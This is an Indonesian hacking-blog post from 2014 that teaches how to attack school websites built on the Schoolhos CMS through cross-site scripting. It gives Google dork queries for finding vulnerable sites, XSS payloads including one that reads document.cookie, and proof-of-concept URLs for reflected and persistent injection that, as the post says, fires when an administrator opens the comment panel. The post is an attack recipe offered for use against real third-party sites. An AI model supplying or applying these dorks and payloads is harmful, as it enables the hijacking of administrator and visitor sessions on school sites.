Hacking Is My Life

affiliates

Home » Uncategories » Tutorial Hack Situs Sekolah CMS Schoolhos - XSS
Rabu, 09 Juli 2014

Tutorial Hack Situs Sekolah CMS Schoolhos - XSS



Google Dork: 
inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS
CONTOH XSS :
<script>alert('barrabravaz');</script>
<script>alert(document.cookie);</script>
<script>window.open("http://www.angonkimcil.blogspot.com/")</script>

POC : 
 http://www.contoh.com/index.php?p=detberita&id=XSS



- Presistent XSS :
POC :
http://www.contoh.com/index.php?p=detberita&id=XSS <--- Inject XSS anda disini.

http://www.contoh.com/adminpanel/komentar.php <--- Apabila Si Admin melihat/masuk di halaman ini, script akan otomatis ter eksekusi.
http://www.contoh.com/index.php?p=detberita&id=XSS <--- Jika user / urang yang sedang browsing di halaman yang anda kenai XSS, otomatis script XSS anda ter eksekusi :D
Comments
0 Comments

0 Response to "Tutorial Hack Situs Sekolah CMS Schoolhos - XSS "

Posting Komentar

Langganan: Posting Komentar (Atom)

Hacking Is Not a Criminal